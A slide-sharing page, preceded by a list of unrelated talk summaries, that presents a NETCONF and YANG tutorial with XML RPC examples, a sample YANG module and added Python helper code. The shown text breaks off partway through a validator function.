The slides from Software Diagnostics Services Linux core dump analysis training. The training description: "Learn how to analyse Linux process crashes and hangs, navigate through process core memory dump space and diagnose corruption, memory leaks, CPU spikes, blocked threads, deadlocks, wait chains, and much more. This book uses a unique and innovative pattern-oriented diagnostic analysis approach to speed up the learning curve. The training consists of 13 practical step-by-step exercises using GDB debugger highlighting more than 25 memory analysis patterns diagnosed in 64-bit process core memory dumps. The training also includes source code of modelling applications, a catalogue of relevant patterns from Software Diagnostics Institute, and an overview of relevant similarities and differences between Windows and Linux user space memory dump analysis useful for engineers with Wintel background."
This document discusses file systems and distributed file systems. It describes how file systems work, including hardware, partitions, logical volume management (LVM), and basic and distributed file systems. It focuses on GlusterFS and NFS distributed file systems. GlusterFS allows various volume types including distributed, replicated, distributed-replicated and stripe. NFS provides network access but no redundancy. The document also discusses storage solutions for AI training workloads, including Pure Storage FlashBlade and AIRI systems optimized for high-performance needs of AI.
Building IAM for OpenStack, presented at CIS (Cloud Identity Summit) 2015.
Discuss Identity Sources, Authentication, Managing Access and Federating Identities
Systemd is an init system that replaces traditional init daemons. It allows for parallel startup of services through dependency-based activation of units which encapsulate system objects like services, devices, and mounts. Systemd also provides on-demand activation of services through sockets, buses, devices, and file paths. It aims to be backwards compatible with System V while offering improvements like parallel startup and centralized logging.
USENIX LISA2021 talk by Brendan Gregg (https://www.youtube.com/watch?v=_5Z2AU7QTH4). This talk is a deep dive that describes how BPF (eBPF) works internally on Linux, and dissects some modern performance observability tools. Details covered include the kernel BPF implementation: the verifier, JIT compilation, and the BPF execution environment; the BPF instruction set; different event sources; and how BPF is used by user space, using bpftrace programs as an example. This includes showing how bpftrace is compiled to LLVM IR and then BPF bytecode, and how per-event data and aggregated map data are fetched from the kernel.
A Deep Dive into macOS MDM (and How it can be Compromised)Priyanka Aash
This document provides an overview of macOS MDM (Mobile Device Management) and DEP (Device Enrollment Program) protocols. It describes the 7 key steps in the enrollment process: 1) device record creation, 2) assignment, 3) sync, 4) check-in, 5) profile retrieval, 6) profile installation, and 7) listening for MDM commands. It then details a vulnerability in the "InstallApplication" command that could allow a man-in-the-middle attack and demonstrates an exploit. Recommendations are provided for Apple and MDM vendors to improve security, such as requiring pinning and revocation checks.
Tutorial WiFi driver code - Opening Nuts and Bolts of Linux WiFi SubsystemDheryta Jaisinghani
While we understand the complex interplay of OSI layers, in theory, in practice understanding their implementation is a non-trivial task. The implementation details that enables a network interface card to communicate with its peers are oblivious to the end-users. Developers venturing into this domain for the first time often find it hard to find relevant tutorials that enable them to understand these implementation details. The aim of this talk is to provide an overview of WiFi Subsystem implemented in the Linux operating system. Specifically, this talk will explain the sequence of events that occur from application layer till physical layer when a connection is established over WiFi. After this talk, the audience will understand
(1) the bird's eye view of Linux WiFi Subsystem,
(2) what happens in an operating system when a WiFi card is plugged-in,
(3) how is a packet received/transmitted from physical layer to operating system kernel and vice-versa,
(4) brief overview of code structure of open-source drivers, and lastly
(5) important pointers to kick start driver code modifications.
Video Available here: https://www.youtube.com/watch?v=pa1oEyc7Dm0
The Linux kernel is undergoing the most fundamental architecture evolution in history and is becoming a microkernel. Why is the Linux kernel evolving into a microkernel? The potentially biggest fundamental change ever happening to the Linux kernel. This talk covers how companies like Facebook and Google use BPF to patch 0-day exploits, how BPF will change the way features are added to the kernel forever, and how BPF is introducing a new type of application deployment method for the Linux kernel.
This document discusses KVM virtualization and why it is considered the best platform. It states that KVM provides high performance, strong security through EAL4+ certification and SE Linux, and can save customers up to 70% on costs compared to other solutions. It also supports various operating systems and works with Red Hat products like OpenStack and Red Hat Enterprise Virtualization for managing virtualization. Charts are included showing KVM outperforming VMware on benchmark tests using different CPU core counts.
This document provides an overview of a PowerShell Basics training session. It discusses the curriculum, which will cover topics like the basics of PowerShell, cmdlets, piping, and scripting over 4 days. It highlights why PowerShell is useful for system administrators by providing a simplified syntax and being more secure than VBScript. PowerShell allows familiar commands and integrates with Microsoft products like Windows, Exchange, and SQL Server.
Lesson 2 Understanding Linux File SystemSadia Bashir
The document provides an overview of Linux file systems and file types. It discusses:
1) The main types of files in Linux including directories, special files, links, sockets and pipes.
2) The standard Linux directory structure and the purpose of directories like /bin, /sbin, /etc, and /usr.
3) Common Linux file extensions and hidden files that begin with a dot.
4) Environment variables and how they can be used to customize a system.
5) Symbolic links and how they create references to files without copying the actual file.
The document provides information about RPM (Red Hat Package Manager), including that it is the default package management system for Red Hat-based Linux distributions. It describes how RPM allows users to install, update, uninstall, query, verify and manage software packages. It also provides examples of common RPM commands and their usage, such as installing, upgrading, verifying, and querying packages.
This document discusses Linux kernel crash capture and analysis. It begins with an overview of what constitutes a kernel crash and reasons crashes may occur, both from hardware and software issues. It then covers using kdump to capture virtual memory cores (vmcores) when a crash happens, and configuring kdump for optimal core collection. Finally, it discusses analyzing vmcores after collection using the crash utility, including commands to inspect system information, backtraces, logs, and more.
This document provides an overview of advanced Docker topics including Docker installation, Docker networking using bridges and volumes, and creating Dockerfiles. It discusses installing Docker on CentOS, the different types of Docker networks including bridge, host, overlay and macvlan. It also covers creating and managing Docker volumes, starting containers with volumes, and creating Dockerfiles with components like FROM, RUN, COPY and ENTRYPOINT.
Introduction to the new MediaTek LinkIt™ Development Platform for RTOSMediaTek Labs
The new MediaTek LinkIt™ Development Platform for RTOS is based on ARM Cortex-M4 MCU architecture and provides leading features for the creation of connected appliances, home and office automation devices, smart gadgets, and IoT bridges. Supporting a range of chipsets (initially the MediaTek MT7687F), LinkIt for RTOS offers the convenience of a single toolset and common API implemented over a popular RTOS. With this you can achieve economies across a full range of consumer and business IoT devices. The platform consists of a Software Development Kit (SDK), Hardware Development Kits (HDKs), including modules from supply chain partners, and related technical documentation. The first release of the platform supports the MediaTek MT7687F Wi-Fi SOC which has a 192 MHz MCU, 1×1 802.11b/g/n Wi-Fi subsystem, integrated security engine (AES and 3DES/SHA), embedded SRAM/ROM and 2MB flash. The new platform uses FreeRTOS with open-source modules for TCP/IP, SSL/TLS, HTTP (client and server), SNTP, DHCP daemon, MQTT, XML and JSON. Development and debugging is supported by free command line tools, plus a KEIL plug-in.
SLSA - An End-to-End Framework for Supply Chain Integrity (Sakha Global)
One of the biggest challenges for software developers is the need to make informed choices about the external software and products they use in their own software systems. Evaluating whether a given system is appropriately secured can be challenging, especially if it’s external or owned by a third party.
This so-called software supply chain has been under increasing scrutiny in recent years, with attacks on software systems being responsible for damages to both public and private interests. In collaboration with the Open Source Security Foundation (OpenSSF), Google has proposed Supply-chain Levels for Software Artifacts (SLSA). The new SLSA framework formalizes criteria around software supply chain integrity, to help the industry and open-source ecosystem secure the software development lifecycle.
SLSA (pronounced "salsa") is a security framework from source to service, giving anyone working with software a common language for increasing levels of software security and supply chain integrity. It’s how you get from safe enough to being as resilient as possible, at any link in the chain.
This SlideShare explores the concept of SLSA in brief.
From KubeCon to ContainerDays, eBPF is trendy in the Cloud Native world. What is eBPF, why is it revolutionary, and what can it bring to you specifically?
Through concrete examples applied to observability, networking, and security, this talk explains the principles of eBPF and its concrete advantages for connecting and securing Cloud Native applications.
This talk explains what eBPF is and why it is revolutionary in several fields, gives examples of tools that use eBPF and what they gain from it, and opens up to the future of that technology.
Video: https://www.youtube.com/watch?v=JRFNIKUROPE . Talk for linux.conf.au 2017 (LCA2017) by Brendan Gregg, about Linux enhanced BPF (eBPF). Abstract:
A world of new capabilities is emerging for the Linux 4.x series, thanks to enhancements that have been included in Linux to Berkeley Packet Filter (BPF): an in-kernel virtual machine that can execute user space-defined programs. It is finding uses for security auditing and enforcement, enhancing networking (including eXpress Data Path), and performance observability and troubleshooting. Many new open source tools that use BPF have been written in the past 12 months for performance analysis. Tracing superpowers have finally arrived for Linux!
For its use with tracing, BPF provides the programmable capabilities to the existing tracing frameworks: kprobes, uprobes, and tracepoints. In particular, BPF allows timestamps to be recorded and compared from custom events, allowing latency to be studied in many new places: kernel and application internals. It also allows data to be efficiently summarized in-kernel, including as histograms. This has allowed dozens of new observability tools to be developed so far, including measuring latency distributions for file system I/O and run queue latency, printing details of storage device I/O and TCP retransmits, investigating blocked stack traces and memory leaks, and a whole lot more.
This talk will summarize BPF capabilities and use cases so far, and then focus on its use to enhance Linux tracing, especially with the open source bcc collection. bcc includes BPF versions of old classics, and many new tools, including execsnoop, opensnoop, funccount, ext4slower, and more (many of which I developed). Perhaps you'd like to develop new tools, or use the existing tools to find performance wins large and small, especially when instrumenting areas that previously had zero visibility. I'll also summarize how we intend to use these new capabilities to enhance systems analysis at Netflix.
This document provides a tutorial on NETCONF and YANG, which are standards for network configuration and management. NETCONF was designed to address operators' requirements for easier network-wide configuration, validation of changes, and transactional management across multiple devices. It uses SSH for secure transport and XML encoding. YANG provides data models to define the configuration and state data. The tutorial covers the background and motivation for these standards, an overview of NETCONF operations and examples, and a demonstration of YANG data modeling. It explains how NETCONF enables network-wide atomic transactions, fulfilling a key operator need and improving the cost and complexity of network management.
Open source policy: OpenDaylight and OpFlex (belaire11)
Presentation of an approach to building an OpFlex Agent, which operates in an OpenDaylight and/or OpenStack infrastructure using OVS. This will be presented at LinuxCon in Chicago (August 2014).
Non-Fluff Software Defined Networking, Network Function Virtualization and IoT (Mark Ryan Castellani)
This document provides an overview of SDN and NFV, including:
- SDN advocates replacing standardized networking protocols with centralized software applications that configure network elements. NFV advocates replacing hardware network elements with software running on commercial off-the-shelf servers.
- SDN and NFV allow for faster deployment of new services and relocation of network functions for optimization of resources. They facilitate service chaining through centralized policy configuration.
- A taxonomy is presented that distinguishes between trends in computational communications, hardware/software implementation, device programmability, and functional location.
Open Source and Cloud: Change Through Collaboration (OPNFV)
In recent years as virtualization and cloud became more and more mature an opportunity has been created for the industry to move towards an NFV networking methodology. In parallel with this phenomenon the role of open source has evolved to establish a fundamentally new paradigm for software development. The ICT industry has had to adapt to this change and move away from traditional ways of working.
During this presentation we will share some of our experience of the cloud market, including SDN and NFV. We intend to shed light on some of the challenges faced and the lessons learnt on the path toward collaborative standardization and open source development. We will also highlight the importance of OPNFV and its role as an avenue to upstream communities for both investigation and cooperation.
Deploying OpenStack with Cisco Networking, Compute and Storage (Lora O'Haver)
Cisco offers solutions for deploying OpenStack with Cisco compute, network, and storage technologies. Key elements include Cisco's participation in the OpenStack community, Cisco OpenStack engineering efforts, and Cisco technology partnerships with companies providing OpenStack platforms. Cisco provides unified management of compute and network resources through Cisco UCS.
This document provides a summary of a YANG tutorial presentation on advanced YANG statements, including must statements, augment statements, when statements, choice statements, identity statements, feature statements, deviations, and YANG modeling strategies. It discusses topics like restricting valid values with XPath expressions in must statements, adding new data with augment statements, making data conditional with when statements, modeling related enumerations with identity statements, and marking data as optional with feature statements. The presentation aims to help people understand and properly apply these important YANG modeling constructs.
Synopsis: A discussion of the requirements for next generation network management identified in RFC 3535 which lead to the development of NETCONF and YANG.
Synopsis: Part 1 of a tutorial on the YANG data modeling language. The basics of YANG are taught in this module. More advanced YANG statements are taught in Part 2.
SDN & NFV Introduction - Open Source Data Center Networking (Thomas Graf)
This document introduces software defined networking (SDN) and network functions virtualization (NFV) concepts. It discusses challenges with traditional networking and how SDN and NFV address these by decoupling the control and data planes, centralizing network intelligence, and abstracting the underlying network infrastructure. It then provides examples of open source SDN technologies like OpenDaylight, Open vSwitch, and OpenStack that can be used to build programmable software-defined networks and virtualized network functions.
What is NFV? How does it relate to SDN, what does it mean for the telecommunications industry, and why should anyone outside of that industry care?
Presentation delivered at CloudOpen Europe, Düsseldorf, October 2014
An introduction to the key concepts of SDN and NFV with visuals of:
- How SDN is transforming the Data Center
- How NFV is transforming the Service Provider domain and the End-customer domain
- Objectives
- Origin
- Ambassadors
- Applicability
- Analogies
- Benefits
- Industry Standards
- Drivers
- Obstacles
- Growth
- Resources and Events
Agile OpenStack Networking with Cisco Solutions (Cisco DevNet)
A session in the DevNet Zone at Cisco Live, Berlin. One of the key areas of contributions from Cisco within OpenStack has been in the evolution and the development of the OpenStack Networking Service - Neutron. Using Neutron's Modular Layer 2 (ML2) plug-in and advanced services framework, Cisco has integrated products and solutions with the networking service to simplify the deployment of highly scalable, manageable and performant networks. Through this session we will cover and provide details of reference as well as the various OpenStack Neutron plugins/drivers for hardware and software Cisco products including the Nexus 1k/3k/5k/6k/7k/9k, UCS FI, CSR 1kv, ASR1K, CPNR and Application Policy Infrastructure Controller (APIC). The audience will also learn about Group Based Policy API in OpenStack that is based on the ACI Policy model. We will further discuss different OpenStack networking architecture, deployments and understand Cisco’s community code contribution that enable and support IPv6 and NFV related features in Neutron.
NFV: Virtual Network Function Architecture (sidneel)
This document discusses network function virtualization (NFV) and virtual network functions (VNFs). It covers the overview of VNF architecture in the NFV framework, including VNF design patterns, properties, lifecycle, and fault management. VNFs are software implementations of network functions that run over NFV infrastructure and are orchestrated by NFV orchestrators and VNF managers. A VNF consists of one or more VNF components that have well-defined interfaces and can be deployed, managed, and upgraded independently. The document describes the various states, interfaces, and descriptors involved in the lifecycle of VNF instantiation, scaling, updating and upgrading.
Introductory slides explaining SDN and NFV technologies: the difference between them and when each one is used. They also cover some Cisco products in each area (SDN, NFV and automation), with real use cases deployed in today's service provider networks.
Hope you like it
SDN & NFV Introduction (SDN NFV Day ITB 2016) (SDNRG ITB)
The document discusses Software Defined Networking (SDN) and Network Function Virtualization (NFV). It provides a short introduction to SDN and NFV, including what they are, why they were developed, and how they work. It then discusses some key points about SDN, such as how it involves computing a function on an abstract network and how network virtualization is a major use case. Finally, it discusses real world examples of SDN deployment today and the business drivers for organizations to adopt SDN technologies on aggressive timelines.
This document provides an introduction to OpenFlow, SDN, and NFV. It describes the need for new networking paradigms and outlines some of the key problems with traditional networking approaches. OpenFlow is presented as providing open interfaces and programmability to network nodes. SDN is defined as separating the control logic from the forwarding plane and enabling programmable automation through open APIs. NFV aims to virtualize network functions to improve flexibility, reduce costs, and accelerate service deployment using standard IT virtualization technologies.
Rudder is an easy to use, web-driven, role-based solution for IT Infrastructure Automation and Compliance. With a focus on continuously checking configurations and centralising real-time status data, Rudder can show a high-level summary (“ISO 27001 rules are at 100%!”) and break down noncompliance issues to a deep technical level (“Host prod-web-03: SSH server configuration allows root logins”).
A few things that make Rudder stand out:
- A simple framework allows you to extend the built-in rules to implement specific low-level configuration patterns, however complex they may be, using simple building blocks (“ensure package installed in version X,” “ensure file content,” “ensure line in file,” etc.). A graphical builder lowers the technical level required to use this.
- Each policy can be independently set to be automatically checked or enforced on a policy or host level. In Enforce mode, each remediation action is recorded, showing the value of these invisible fixes.
- Rudder works on almost every kind of device, so you’ll be managing physical and virtual servers in the data center, cloud instances, and embedded IoT devices in the same way.
- Rudder is designed for critical environments where a security breach can mean more than a blip in the sales stats. Built-in features include change requests, audit logs, and strong authentication.
- Rudder relies on an agent that needs to be installed on all hosts to audit. The agent is very lightweight (10 to 20 MB of RAM at peak) and blazingly fast (it’s written in C and takes less than 10 seconds to verify 100 rules). Installation is self-contained, via a single package, and can auto-update to limit agent management burden.
- Rudder is a true and professional open source solution—the team behind Rudder doesn’t believe in the dual-speed licensing approach that makes you reinstall everything and promotes open source as little more than a “demo version.”
Rudder is an established project with several tens of thousands of nodes managed, in companies from small to the biggest in their field. Typical deployments manage hundreds to thousands of nodes. The biggest known deployment in 2016 is about 7000 nodes.
At the moment there is a lot of talk about batch processing in the Big Data world. But what about streaming and real time? Many Big Data frameworks try to address this problem. At the top of the list is Spark: thanks to its Spark Streaming component, it allows continuous processing of data streams with 24/7 availability.
On the agenda:
- Streaming and Big Data architecture
- Spark Streaming "hello world"
- Integrating Flume with Spark Streaming
- Use case: metrics on application logs
- Physical architecture: driver / workers / receivers
- Monitoring Spark Streaming
- Failover: reliable / unreliable sources, checkpoint, recovery
- Tuning and performance.
Speakers:
- Nadhem LAMTI, Technical Architect at PALO IT
For 10 years Nadhem has worked mainly on large-scale Java EE projects in various sectors (telecommunications, banking, finance, transport, tourism, etc.), building broad expertise across many technologies and architectures. With solid experience as a performance and support engineer, Nadhem can handle production issues in complex information systems. Currently on assignment at Voyages SNCF, he contributes to a large Big Data log-centralisation project and takes a particular interest in Apache Spark, the new flagship data-processing product.
- Saâd-Eddine MALTI, Database Expert at Voyages SNCF
At Voyages SNCF for 10 years, Saâd-Eddine works as a database expert across all applications. Voyages SNCF's stated move towards Big Data has led Saâd-Eddine to invest fully in this field, including in Apache Spark, the new flagship data-processing product.
In this training you will learn to use the advanced networking and security technologies of FortiGate.
Topics include features commonly used in larger or more complex enterprise or MSSP networks, such as advanced routing, transparent mode, redundant infrastructure, site-to-site IPsec VPN, single sign-on, web proxy and diagnostics.
In this course you will learn to troubleshoot the full range of Palo Alto Networks next-generation firewalls. You will gain in-depth knowledge of how to diagnose visibility and control of applications, users and content. In a hands-on environment you will also troubleshoot common issues related to the configuration and operation of the security features of Palo Alto Networks' PAN-OS operating system.
- Introduction to performance measurement
- Stress test before tuning
a. Test cases
b. Sizing (server)
c. Results
- Optimising JBoss EAP 5.1
a. Remove what your application does not use
b. log4j configuration
c. JVM memory configuration
d. Data source configuration
e. HTTP connection configuration
- Stress test after tuning
Techdays 2009 - Active Directory Domain Services: best practices and princi... (fabricemeillon)
Active Directory Domain Services is at the heart of the security, administration and interoperability features of the Microsoft Windows Server platform. Many new features arrived with Windows Server 2008: read-only domain controllers, auditing, fine-grained password policies, snapshot-based backup and restore... This session covers best practices for implementing them and presents the new features coming with Windows Server 2008 R2. A session not to be missed to ensure the success of your migrations.
Servlets
Servlet life cycle
Processing form data
State management with cookies and sessions
Introduction to JSP
Custom JSP tags
Design rules
2. Motivations
A protocol for network management
Separate configuration state from operational state
Make configurations persistent
Notifications, dump and restore
3. Configuration Management Protocol
SNMP
  Widely used, mainly for monitoring
  Configuration management is complex
NETCONF
  XML-based encoding
  RPC mechanism
  Secured transport (SSH, SSL/TLS ...)
  Uses a data model to structure the data (YANG)
4. Configuration Management Protocol
Feature                                SNMP   NETCONF
Config vs operational state            -      +
Multiple configs                       -      +
Persistence of config state            °      +
Config change & notification events    -      +
Config dump & restore                  -      +
Support of standard tools              -      +
(+ supported, - not supported)
5. NETCONF
Layered protocol
Layer                Example
Content              Configuration data
Operations           <get-config>, <edit-config>
RPC                  <rpc>, <rpc-reply>
Transport protocol   BEEP, SSH, SSL, console
6. NETCONF Transport
Messages encoded in XML
Messages encrypted by the SSH transport
NETCONF over SSH, SOAP or BEEP
Authentication, integrity and confidentiality are provided by the transport
Connection-oriented, over TCP
Several TCP ports are assigned: 830 (SSH), 831 (BEEP), 832 (SOAP over HTTPS), 833 (SOAP over BEEP), 6513 (TLS)
Example <hello> exchanged at session start (the ]]>]]> sequence is the base:1.0 end-of-message marker):
<?xml version="1.0" encoding="UTF-8"?>
<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <capabilities>
    <capability>urn:ietf:params:netconf:base:1.0</capability>
  </capabilities>
</hello>]]>]]>
7. NETCONF RPC Model
RPC methods are carried in the body of an XML message
<rpc> element:
<rpc message-id="101"
     xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <some-method>
    <!-- method parameters here... -->
  </some-method>
</rpc>
<rpc-reply> element:
<rpc-reply message-id="101"
           xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
           xmlns:ex="http://example.net/content/1.0" ex:user-id="fred">
  <data>
    <!-- contents here... -->
  </data>
</rpc-reply>
<rpc-error> element (no message-id here, because the request it answers lacked one):
<rpc-reply
    xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <rpc-error>
    <error-type>rpc</error-type>
    <error-tag>missing-attribute</error-tag>
    <error-severity>error</error-severity>
    <error-info>
      <bad-attribute>message-id</bad-attribute>
      <bad-element>rpc</bad-element>
    </error-info>
  </rpc-error>
</rpc-reply>
<ok/> element:
<rpc-reply message-id="101"
           xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <ok/>
</rpc-reply>
8. NETCONF Configuration Datastores
Datastores hold the system's configuration state
Defined by capabilities: :writable-running, :candidate, :startup (the running datastore always exists and needs no capability)
The capabilities advertised in the server's <hello> tell the client which datastores it supports
Datastores: startup, running, candidate
9. NETCONF Configuration Datastores
<running/>
  Holds the currently active configuration
  Can be edited directly only when the server advertises :writable-running
  Queried with <get>, it also returns the device's state information
<candidate/>
  Holds the configuration to be applied once it has been validated and committed on the server
  Changes made to this datastore do not take effect immediately
  Operations used: <lock>, <validate> and <commit> to validate and apply it
<startup/>
  Holds the configuration to be loaded at the next reboot
  <copy-config> copies the running configuration into it to save it persistently
10. NETCONF Base Operations
Operation       Description
get             Retrieve configuration from the running datastore together with device state data (statistics)
get-config      Retrieve configuration from a datastore (running, candidate or startup)
edit-config     Modify the configuration held in a datastore
copy-config     Copy a configuration from one datastore (or URL) to another
delete-config   Delete a datastore (running cannot be deleted)
commit          Commit the contents of <candidate/> to <running/>
lock            Lock a datastore against writes from other sessions
unlock          Release a lock held by this session
validate        Validate the full contents of a datastore
close-session   Close the current session gracefully
kill-session    Terminate another session
11. NETCONF Base Operations
Before editing: which datastore should be the target?
Save options
if ':candidate' capability supported:
    target = <candidate/>
elif ':writable-running' capability supported:
    target = <running/>
elif ':url' capability supported:
    target = <url>file://path/to/file</url>
else:
    target = None  # server is non-compliant
if ':startup' capability supported:
    save_fn = <copy-config>
                <target><startup/></target>
                <source><running/></source>
              </copy-config>
else:
    save_fn = None  # the server updates non-volatile storage automatically
12. Candidate Configuration Example
<rpc message-id="101"
     xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <lock>
    <target><running/></target>
  </lock>
</rpc>
# server returns <ok/>
<rpc message-id="102"
     xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <lock>
    <target><candidate/></target>
  </lock>
</rpc>
# server returns <ok/>
<rpc message-id="103"
     xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
  <edit-config>
    <target><candidate/></target>
    <default-operation>none</default-operation>
    <test-option>test-then-set</test-option>
    <config>
      <interface xmlns="urn:ietf:params:xml:ns:yang:ietf-interfaces">
        <name>eth1</name>
        <ipv4-address>192.168.1.3</ipv4-address>
        <macaddr>00:11:22:33:44:55</macaddr>
      </interface>
    </config>
  </edit-config>
</rpc>
# server returns <ok/>
(The <interface> content is illustrative: the real ietf-interfaces module nests <interface> inside <interfaces> and does not define these address leaves.)
# Commit, then unlock the candidate and running datastores
The full sequence of RPCs to execute:
1. lock <running/>
2. lock <candidate/>
3. edit-config <candidate/>
4. commit <candidate/>
5. unlock <candidate/>
6. unlock <running/>
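The following is an added example, not code from the original slides: client-side helpers in Python for the exchange described on slides 6, 7, 11 and 12. It parses the server <hello>, selects the target datastore from the advertised capabilities exactly as the slide 11 pseudocode does, generates the lock / edit-config / commit / unlock RPCs with message-ids (plus the cleanup sequence when a step fails), and classifies <rpc-reply> messages as <ok/>, <rpc-error> or data. No network I/O happens: the server messages are constructed inline, the SSH transport on port 830 is assumed to be in place, and the function names are this example's own.

```python
"""Added example (not from the original slides): NETCONF 1.0 client helpers.
Framing, capability-driven datastore selection, the candidate transaction
from slide 12 and rpc-reply classification. All server messages below are
constructed for this example, not captured from a device."""
import xml.etree.ElementTree as ET

NC = "urn:ietf:params:xml:ns:netconf:base:1.0"
CAP = "urn:ietf:params:netconf:capability:"
EOM = "]]>]]>"  # base:1.0 end-of-message delimiter (slide 6)


def frame(message: str) -> str:
    """Append the 1.0 end-of-message marker to one XML document."""
    return message + EOM


def unframe(stream: str) -> list:
    """Split a received stream into individual XML messages."""
    return [m.strip() for m in stream.split(EOM) if m.strip()]


def parse_hello(xml_text: str) -> set:
    """Return the capability URIs advertised in a <hello>."""
    root = ET.fromstring(xml_text)
    if root.tag != f"{{{NC}}}hello":
        raise ValueError("expected <hello> in the NETCONF base namespace")
    return {c.text.strip() for c in root.iter(f"{{{NC}}}capability") if c.text}


def choose_target(caps: set):
    """Slide 11 decision: prefer :candidate, then :writable-running, then :url."""
    if CAP + "candidate:1.0" in caps:
        return "candidate"
    if CAP + "writable-running:1.0" in caps:
        return "running"
    if any(c.startswith(CAP + "url:1.0") for c in caps):  # URI carries ?scheme=...
        return "url"
    return None  # non-compliant server: no writable datastore at all


def rpc(message_id: int, body: str) -> str:
    return f'<rpc message-id="{message_id}" xmlns="{NC}">{body}</rpc>'


def edit_config(target: str, config_xml: str, caps: set) -> str:
    # <test-option> is only legal when the server advertises :validate
    test = "<test-option>test-then-set</test-option>" if any(
        c.startswith(CAP + "validate:") for c in caps) else ""
    return (f"<edit-config><target><{target}/></target>"
            f"<default-operation>none</default-operation>{test}"
            f"<config>{config_xml}</config></edit-config>")


def candidate_transaction(config_xml: str, caps: set, first_id: int = 101) -> list:
    """Ordered (message-id, rpc) pairs for the slide 12 workflow, plus a
    copy-config to <startup/> when the server keeps a separate startup store."""
    steps = ["<lock><target><running/></target></lock>",
             "<lock><target><candidate/></target></lock>",
             edit_config("candidate", config_xml, caps),
             "<commit/>"]
    if CAP + "startup:1.0" in caps:
        steps.append("<copy-config><target><startup/></target>"
                     "<source><running/></source></copy-config>")
    steps += ["<unlock><target><candidate/></target></unlock>",
              "<unlock><target><running/></target></unlock>"]
    return [(first_id + i, rpc(first_id + i, s)) for i, s in enumerate(steps)]


def abort_transaction(first_id: int) -> list:
    """Cleanup when a step fails: drop the uncommitted candidate and release
    both locks in reverse order so other sessions are not left locked out."""
    steps = ["<discard-changes/>",
             "<unlock><target><candidate/></target></unlock>",
             "<unlock><target><running/></target></unlock>"]
    return [(first_id + i, rpc(first_id + i, s)) for i, s in enumerate(steps)]


def parse_reply(xml_text: str, expected_id: int):
    """Classify an <rpc-reply>: ('ok', None), ('error', [error-tags]) or
    ('data', element). The message-id must match the request it answers."""
    root = ET.fromstring(xml_text)
    if root.tag != f"{{{NC}}}rpc-reply":
        raise ValueError("not an <rpc-reply>")
    if root.get("message-id") != str(expected_id):
        raise ValueError("message-id mismatch: reply does not belong to this request")
    errors = root.findall(f"{{{NC}}}rpc-error")
    if errors:
        return "error", [e.findtext(f"{{{NC}}}error-tag") for e in errors]
    if root.find(f"{{{NC}}}ok") is not None:
        return "ok", None
    return "data", root.find(f"{{{NC}}}data")


# Constructed server messages for this example (not from a real device)
SERVER_HELLO = frame(
    f'<hello xmlns="{NC}"><capabilities>'
    '<capability>urn:ietf:params:netconf:base:1.0</capability>'
    f'<capability>{CAP}candidate:1.0</capability>'
    f'<capability>{CAP}startup:1.0</capability>'
    f'<capability>{CAP}validate:1.1</capability>'
    '</capabilities></hello>')
OK_REPLY = frame(f'<rpc-reply message-id="101" xmlns="{NC}"><ok/></rpc-reply>')
ERR_REPLY = frame(
    f'<rpc-reply message-id="103" xmlns="{NC}"><rpc-error>'
    '<error-type>application</error-type><error-tag>lock-denied</error-tag>'
    '<error-severity>error</error-severity></rpc-error></rpc-reply>')

if __name__ == "__main__":
    caps = parse_hello(unframe(SERVER_HELLO)[0])
    print("target datastore:", choose_target(caps))
    for mid, message in candidate_transaction("<top xmlns='urn:example:top'/>", caps):
        print(mid, message)
    print(parse_reply(unframe(OK_REPLY)[0], 101))
    print(parse_reply(unframe(ERR_REPLY)[0], 103))
    print([m for m, _ in abort_transaction(104)])
```

The message-id check in parse_reply is what ties a reply to the request it answers; without it a delayed or spurious reply can be mistaken for the <ok/> of a lock or commit. xml.etree does not protect against entity-expansion attacks, so replies from a device you do not fully trust should be parsed with a hardened parser such as defusedxml.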
13. YANG
Data modeling language
Used by NETCONF (content layer) for
  • configuration data
  • state data
Hierarchical description of the data
Relations between modules and submodules
  • include (a module pulls in its own submodules)
  • import (a module references definitions from another module)
(Figure: two modules, each including its submodules, with an import relation between them.)
14. Modules & Submodules
YANG module content:
  Header information
  Imports & includes
  Type definitions
  Configuration and operational data declarations
  RPC and notification declarations
15. Data Modeling
Data nodes:
  leaf, leaf-list, container, list
YANG data types:
  Base types: int8/16/32/64, uint8/16/32/64, string, enumeration, boolean ...
  Derived types (typedef), reusable node groups (grouping) ...
Example:
container system {
  list user {
    key name;
    leaf name {
      type string;
    }
    leaf uid {
      type uint32;
    }
    leaf full-name {
      type string;
    }
  }
  leaf hostname {
    type string;
    mandatory true;
    config true;
  }
}
(Figure: tree view of the example: system contains the user list with name, uid and full-name, and the hostname leaf.)
16. YANG module example
module acme-system {
  namespace "http://acme.example.com/system";
  prefix "acme";
  organization "ACME Inc.";
  contact "joe@acme.example.com";
  description
    "The module for entities implementing the ACME system.";
  revision 2007-11-05 {
    description "Initial revision.";
  }
  container system {
    leaf host-name {
      type string;
      description "Hostname for this system";
    }
    leaf-list domain-search {
      type string;
      description "List of domain names to search";
    }
    list interface {
      key "name";
      description "List of interfaces in the system";
      leaf name {
        type string;
      }
      leaf type {
        type string;
      }
      leaf mtu {
        type int32;
      }
    }
  }
}
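The following is an added example, not code from the original slides: a minimal Python validator for instance data of the acme-system module above. SCHEMA is a hand-written table of that module's nodes; the checks it performs (node outside the module namespace or unknown, int32 range, list key present and unique, a leaf occurring more than once) are the kind a NETCONF server applies to a <config> payload before an <edit-config> with test-then-set is accepted, and the kind a client should run before sending. The <config> payloads are constructed for this example; the function names and the SCHEMA table format are this example's own, not a YANG tool's API.

```python
"""Added example (not from the original slides): validate instance data of
module acme-system. The payloads below are constructed for this example."""
import xml.etree.ElementTree as ET

NS = "http://acme.example.com/system"  # namespace declared by module acme-system
INT32_MIN, INT32_MAX = -2**31, 2**31 - 1

# Hand-written schema table mirroring the acme-system module (not generated)
SCHEMA = {
    "system": {"kind": "container", "children": {
        "host-name": {"kind": "leaf", "type": "string"},
        "domain-search": {"kind": "leaf-list", "type": "string"},
        "interface": {"kind": "list", "key": "name", "children": {
            "name": {"kind": "leaf", "type": "string"},
            "type": {"kind": "leaf", "type": "string"},
            "mtu": {"kind": "leaf", "type": "int32"},
        }},
    }},
}


def local_name(tag: str) -> str:
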